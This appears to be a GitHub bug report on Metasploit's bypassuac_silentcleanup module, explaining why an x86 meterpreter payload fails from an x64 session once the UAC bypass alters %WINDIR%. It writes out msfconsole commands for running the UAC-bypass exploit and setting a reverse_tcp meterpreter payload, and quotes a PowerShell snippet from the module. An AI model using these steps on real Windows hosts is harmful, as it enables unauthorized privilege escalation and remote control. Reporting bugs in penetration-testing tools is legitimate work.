bypassuac_silentcleanup: meterpreter payloads don't work when the selected architecture isn't correct

[cnotin]

Steps to reproduce

1. Obtain a x64 meterpreter session on a x64 Windows 10 host under an admin user but in a non-elevated context (because we want to bypass UAC)
2. Use bypassuac_silentcleanup module with commands:

use exploits/windows/local/bypassuac_silentcleanup
set session 1
run

As we didn't select a payload, windows/meterpreter/reverse_tcp (-> x86) will be selected by default

Expected behavior

We get an elevated session. It should work even if the architecture is incorrect because the generated Powershell begins with an architecture detection gadget:

if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};

See https://github.com/rapid7/rex-powershell/blob/3e79abf73709c9be2e6796da29927aaa171e1405/lib/rex/powershell/command.rb#L238-L244

Current behavior

We don't get any elevated session because this UAC exploit messes with the %WINDIR% env variable (that's its goal!), so the architecture detection gadget fails to launch a new powershell.exe with the correct architecture for the payload, as it uses %WINDIR% in its path:

$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe

Alternative solution: choosing the correct payload:

set payload windows/x64/meterpreter/reverse_tcp

System stuff

Metasploit version

Framework: 5.0.62-dev
Console : 5.0.62-dev

I installed Metasploit with:

Kali package

OS

Kali